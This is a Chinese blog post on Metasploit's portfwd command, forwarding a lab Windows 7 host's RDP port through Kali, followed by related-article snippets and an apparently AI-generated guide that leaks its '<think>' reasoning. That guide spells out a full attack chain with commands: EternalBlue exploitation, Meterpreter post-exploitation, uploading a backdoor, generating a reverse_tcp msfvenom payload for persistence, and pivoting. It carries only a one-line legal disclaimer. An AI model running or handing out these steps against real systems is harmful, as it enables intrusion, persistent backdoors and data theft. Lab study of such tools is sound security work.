portfwd使用

最新推荐文章于 2025-04-03 18:09:11 发布
原创 最新推荐文章于 2025-04-03 18:09:11 发布 · 2.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#portfwd

一款内置于msf的工具

靶机 win7 192.168.5.101
攻击机 win 10 192.168.0.31
攻击机 kali 192.168.5.102

先配置msf,并反弹会话

在这里插入图片描述

转发,把win7 3389转发到kali的33333端口

portfwd add‐l 33333 ‐r 192.168.5.101 ‐p 3389

在这里插入图片描述

使用win10 远程桌面功能访问kali的33333端口,既访问win07远程桌面

在这里插入图片描述

Metasploit Portfwd 端口转发
m0_50526465的博客
05-23 935
Metasploit Portfwd 端口转发 Portfwd简介(端口转发/重定向) Meterpreter shell中的portfwd命令最常用作透视技术,允许直接访问攻击系统无法访问的机器。在可以访问攻击者和目标网络(或系统)的受损主机上运行此命令,我们可以实质上通过本机转发TCP连接,从而使其成为一个支点。就像使用ssh连接的端口转发技术一样,portfwd将中继与连接的机器之间的TCP连接。 操作指令 portfwd -h //查看帮助 Usage: port...
内网安全之:Metasploit 跳板攻击:portfwd 端口转发与端口映射
f_carey的博客
09-03 3717
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Metasploit 中的端口转发与端口映射Metasploit portfwd 原理2 实验环境2.1 建立 meterpreter 反向连接2.2 portfwd 端口转发2.3 portfwd 端口映射 Metasploit portfwd 原理 portfwd 是借用 meterpreter s.
portfwd 端口转发
ailx10
07-23 976
前面我们已经学习了ssh端口转发、防火墙端口转发、rinetd端口转发、nc端口转发、socat端口转发、portmap端口转发,今天我们来学习portfwd端口转发,portfwd 是meterpreter 中的一个功能,那么本次实验就先来制造一个小马,然后基于meterpreter的portfwd,实现远程端口转发,访问跳板机kali的1111端口,就能访问内网win7的3389端口,这也叫3...
Metasploit Portfwd(端口转发/重定向)
干铮的博客
03-23 1108
Metasploit Portfwd端口抓发 获取meterpreter的shell后可进行端口转发操作,可以使用portfwd -h 转发入侵机器的端口。 先获取目标主机的shell建立连接 使用enable_rdp模块开启目标的远程连接 run post/windows/manage/enable_rdp portfwd add -l 3389 -p 3389 -r 192.168.28.131 rdesktop 127.0.0.1:3389 ...
20200503web渗透学习之内网渗透端口转发/映射portfwd
qq_45290991的博客
05-03 767
这几天51放假,但是在忙泰迪杯,选了C题目就是草呀(一种植物) 一、原理 原理层面大佬已经写得很好了:https://xie1997.blog.youkuaiyun.com/article/details/103528138?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control&depth_1-utm_source=distribut
Metasploit 跳板攻击
imtech的博客
03-21 559
今天有一个机会测试MSF的跳板攻击,涉及到端口转发和添加路由,下面详细介绍一下。2个可以单独使用,也可以结合使用。以下是测试拓扑。前提是攻击机192.168.136.155通过某种方式控制了S1,192.168.100.100,然后可以通过端口转发方式连接该主机的其他端口,也可以通过添加路由的方式把该主机当成跳板攻击其他主机。
【工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 16万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
【内网安全】——meterpreter使用攻略
qq_41701460的博客
04-03 1920
原贴在这:https://blog.youkuaiyun.com/qq_63844103/article/details/128815533。
Metasploit portfwd跳板渗透
红领巾 的专栏
07-11 5079
前几天翻看Metasploit’s Meterpreter文档中关于portfwd介绍 Usage:portfwd [ -arv ] [ -L laddr ] [ -l lport ][ -h rhost ] [ -p rport ] [ -P ],看懂了不会用。再者就是在《metasploit渗透测试指南》p89页上参考到了部分。google到了篇老外关于meterpreter的portfwd
Win-PortFwd 项目安装和配置指南
gitblog_01248的博客
10-18 570
Win-PortFwd 项目安装和配置指南 1. 项目基础介绍和主要编程语言 Win-PortFwd 是一个用于在Windows系统上设置端口转发的PowerShell脚本项目。该项目的主要目的是通过使用Windows原生的netsh客户端来实现端口转发功能。端口转发在网络安全和渗透测试中非常有用,尤其是在需要将外部流量转发到内部网络或特定服务时。 该项目的主要编程语言是PowerShell,这是...
【亲测免费】 推荐文章:Win-PortFwd——Windows端口转发的得力助手
gitblog_00894的博客
08-28 948
推荐文章:Win-PortFwd——Windows端口转发的得力助手 在日常的技术工作中,无论是开发者调试环境的搭建,还是IT运维人员的网络配置,端口转发往往是不可或缺的一环。今天,我们为大家介绍一款简单高效、专为Windows系统设计的开源工具——Win-PortFwd。它利用PowerShell脚本,无缝集成Windows内置的netsh命令,实现快速、便捷的端口转发设置。 项目介绍 Win-...
红队隧道应用篇之MsfPortfwd端口转发(三)
xf555er的博客
12-08 1239
Meterpreter shell中的portfwd命令最常用作透视技术,允许直接访问攻击系统无法访问的机器, 例如不出网的内网主机, 前提是你要有一个此内网网段的能出网的主机的Meterpreter shell: 增加端口转发: 删除指定的端口转发: 查看端口转发列表: 清除所有的端口转发-: 监听的本地主机, 默认为127.0.0.1: 查看帮助: 监听的本地端口: 连接的目标端口: 连接的目标IP新增一个端口转发记录, 将本地的8080端口数据转发至内网主机的80端口, 也可以说成将内网主机的80端
端口转发_基于 Portfwd 端口转发
weixin_33456137的博客
12-12 414
文章作者:Micropoor原文链接:https://micropoor.blogspot.comportfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4--IPV6的转换转发。并且内置于meterpreter。其中exe单版本源码如下:https://github.com/rssnsj/portfwd攻击机: 192.168.1.5 Debian靶机...
Metasploit工具使用(下)
剁椒鱼头没剁椒的博客
01-30 2000
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。
渗透测试之内网渗透(四):端口转发
m0_74131821的博客
04-26 2219
在真实的错综复杂的企业环境中进行内网渗透,涉及内网穿透,端口转发,域渗透,提权等一系列的难题
【内网渗透】全网最详细的端口转发教程
TT小子的博客
06-22 6756
最近在真实环境测试和编写靶场实战教程时,总会遇到内网主机无法直接访问,需要通过转发端口、建立代理隧道等方式去访问,以方便后续进一步的横向渗透测试。本文章主要介绍一些端口转发工具的使用
HW中内网代理常用工具总结
Javachichi的博客
10-07 705
靶机A是web服务器,攻击者通过漏洞攻击获得靶机A的服务器权限,靶机B位于内网且未映射至互联网,此时通过利用靶机A自带命令行程序netsh,netsh可将攻击者的流量经由靶机A转发至靶机B,使得攻击者可以访问到位于内网的靶机B。靶机A是web服务器,攻击者通过漏洞攻击获得靶机A的服务器权限,靶机B位于内网且未映射至互联网,此时通过上传portfwd至靶机A,portfwd可将攻击者的流量经由靶机A转发至靶机B,使得攻击者可以访问到位于内网的靶机B。
metasploit(MSF)渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 2397
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
攻防演练中内网代理常用工具总结
Karka_的博客
08-02 977
一个网络请求一般是由客户端发起,服务器响应,而代理服务是这个网络请求的中介,其作用是将客户端的网络请求经由自身代理服务转发至服务端。某些情况下客户端无法直接访问服务端,但代理服务端可以访问服务端,此时客户端与代理服务端建立协议,客户端的请求都经由代理端转发至服务端这便是正向代理。正向代理主要面向客户端服务,服务端的响应会返回给代理服务端,代理服务端会将其转发至客户端。故而正向代理的过程中,服务端无法确定请求的真实发起者,仅与代理端进行通信。
如何使用kali进行msf渗透
最新发布
09-27
<think>我们正在讨论Kali Linux中Metasploit Framework(MSF)的使用方法。根据引用[1][2][3],我们可以总结出以下关键点: 1. MSF是一个强大的渗透测试框架,使用Ruby编写,包含大量漏洞利用模块。 2. 在Kali中,MSF的路径通常为`/usr/share/metasploit-framework`。 3. 使用前需要启动PostgreSQL数据库服务,并确保Metasploit服务运行,以保证数据库连接正常。 4. 基本使用流程包括启动msfconsole、选择模块、配置参数、执行攻击等。 下面我将详细说明Kali中使用MSF进行渗透测试的方法: </think>### Kali系统中Metasploit Framework渗透测试方法详解 以下是基于引用[1][2][3]的MSF标准渗透流程,涵盖从环境配置到实战攻击的完整操作: --- ### 一、环境配置(引用[3]关键步骤) 1. **启动数据库服务** MSF依赖PostgreSQL存储扫描数据: ```bash sudo service postgresql start # 启动数据库 sudo ss -ant | grep 5432 # 验证5432端口监听 ``` 2. **初始化MSF服务** ```bash sudo service metasploit start # 首次运行自动创建msf3数据库 msfconsole # 进入控制台 msf6 > db_status # 验证数据库连接 → "postgresql connected to msf3"[^3] ``` 3. **设置开机自启** ```bash sudo update-rc.d postgresql enable sudo update-rc.d metasploit enable ``` --- ### 二、核心渗透流程(引用[1][2]) #### 阶段1:目标侦查 ```bash # 使用Nmap扫描并入库 msf6 > db_nmap -sV -O 192.168.1.105 msf6 > services -p 445 -c port,state # 检查SMB端口状态[^2] ``` #### 阶段2:漏洞利用(以永恒之蓝为例) ```bash msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 192.168.1.105 # 目标IP msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > set LHOST eth0 # 本地监听接口 msf6 > exploit # 执行攻击 ``` > 成功提示:`Meterpreter session 1 opened` #### 阶段3:后渗透操作(Meterpreter会话) ```bash meterpreter > sysinfo # 获取系统信息 meterpreter > getuid # 查看当前权限 meterpreter > screenshot # 截取目标屏幕[^1] meterpreter > upload /tmp/backdoor.exe C:\\ # 上传后门 ``` #### 阶段4:权限维持 ```bash # 生成持久化后门(引用[2]) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o persistent.exe ``` > 通过`reg setval`或计划任务植入目标系统 --- ### 三、高级技巧 1. **模块开发基础(Ruby)** 参考路径:`/usr/share/metasploit-framework/modules/exploits/windows/`[^2] ```ruby class MetasploitModule < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, 'Name' => "Custom Exploit", 'Description' => %q{自定义漏洞利用模板}, 'Payload' => {'space' => 1024} )) end end ``` 2. **资源脚本自动化** ```bash echo "use exploit/windows/smb/ms17_010_eternalblue" > auto.rc echo "set RHOSTS 192.168.1.105" >> auto.rc msfconsole -r auto.rc # 批量执行命令 ``` 3. **内网渗透隧道** ```bash meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.2.100 # 端口转发 ``` --- ### 四、排错指南 | 问题现象 | 解决方案 | |---------------------------|------------------------------| | `db_status`未连接数据库 | 执行`sudo msfdb init`重建库 | | 模块加载失败 | 运行`sudo apt install metasploit-framework`更新 | | Meterpreter会话意外退出 | 检查防火墙规则,确保LPORT未被拦截 | > **法律声明**:所有操作必须在授权环境下执行,禁止未经授权的渗透测试[^1]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值